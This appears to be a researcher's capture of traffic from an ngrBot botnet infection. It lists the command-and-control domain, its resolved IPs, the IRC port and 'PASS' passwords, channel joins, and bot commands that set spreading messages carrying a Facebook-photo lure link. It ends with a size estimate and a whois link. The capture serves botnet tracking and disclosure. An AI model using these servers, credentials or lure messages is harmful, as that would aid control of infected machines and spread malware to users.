Resolved : [cash.hi5fotos.info] To [61.31.99.67]
Resolved : [cash.hi5fotos.info] To [64.69.44.51]
Resolved : [cash.hi5fotos.info] To [58.19.130.52]
Remote Host Port Number
195.122.131.7 80
199.15.234.7 80
64.62.243.90 80
58.19.130.52 4042 PASS ngrBot or PASS owned
64.69.44.51 4042 PASS ngrBot or PASS owned
61.31.99.67 4042 PASS ngrBot or PASS owned
JOIN #US
PRIVMSG #boss :[d=”http://tinyurl.com/434fj6q”] Error downloading file [e=”12039″]
NICK n{US|XPa}xnkupbh
USER xnkupbh 0 0 :xnkupbh
JOIN #boss ngrBot
PRIVMSG #boss :[HTTP]: Updated HTTP spread interval to “6”
PRIVMSG #boss :[HTTP]: Updated HTTP spread message to “wow, haha http://is.gd/facebook_photoalbum_10_08_2011_jpg”
PRIVMSG #boss :[MSN]: Updated MSN spread interval to “6”
PRIVMSG #boss :[MSN]: Updated MSN spread message to “wow, haha http://is.gd/facebook_photoalbum_10_08_2011_jpg”
PONG 22 MOTD
PRIVMSG #biz# :msn// Thread Disabled.
PRIVMSG #biz# :msn// Thread Activated: Sending Message.
NICK [00|USA|958672]
USER XP-0694 * 0 :COMPUTERNAME
MODE [00|USA|958672] -ix
JOIN #biz# abc
probably 30k or more inside this botnet
hosting infos:
http://whois.domaintools.com/58.19.130.52